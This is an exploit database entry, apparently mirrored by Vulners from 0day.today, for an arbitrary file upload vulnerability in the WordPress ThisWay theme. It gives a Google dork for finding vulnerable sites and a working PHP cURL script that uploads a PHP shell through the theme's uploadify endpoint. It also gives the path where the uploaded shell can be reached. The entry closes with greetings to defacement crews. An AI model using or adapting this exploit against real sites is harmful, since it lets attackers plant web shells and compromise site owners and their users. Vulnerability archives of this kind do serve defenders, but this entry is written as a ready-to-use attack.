Lucene search
K

WordPress ThisWay Shell Upload Vulnerability

🗓️ 05 Nov 2013 00:00:00Reported by Bet0Type 
zdt
 zdt
🔗 0day.today👁 66 Views

WordPress ThisWay Shell Upload Vulnerability. Arbitrary File Upload through Them

Code
########################################################################################
#Exploit title: WordPress ThisWay theme - Arbitrary File Upload Vulnerability
#Author: Bet0
#Google Dork: inurl:"/wp-content/themes/ThisWay/"
#Date:1 November 2013    
#Vendor Homepage: http://themeforest.net/
#Themes Link: http://www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
#Tested on: Windows 7     
########################################################################################

[+]EXPLOIT

<?php
$uploadfile="upl.php";
$ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

[+]SHELL ACCSES
http://[localcrot]/wp-content/uploads/[year]/[month]/[search your shell].php

[+]Twitter: https://twitter.com/Defacto_ID

[+]REGARDS To:
All member Sund4nyM0uz Corporation,Explore Crew, Trackc0de Crew, Malang Cyber Crew, Indonesian Coder, HN-Community, and My Girl :*

#  0day.today [2018-04-15]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation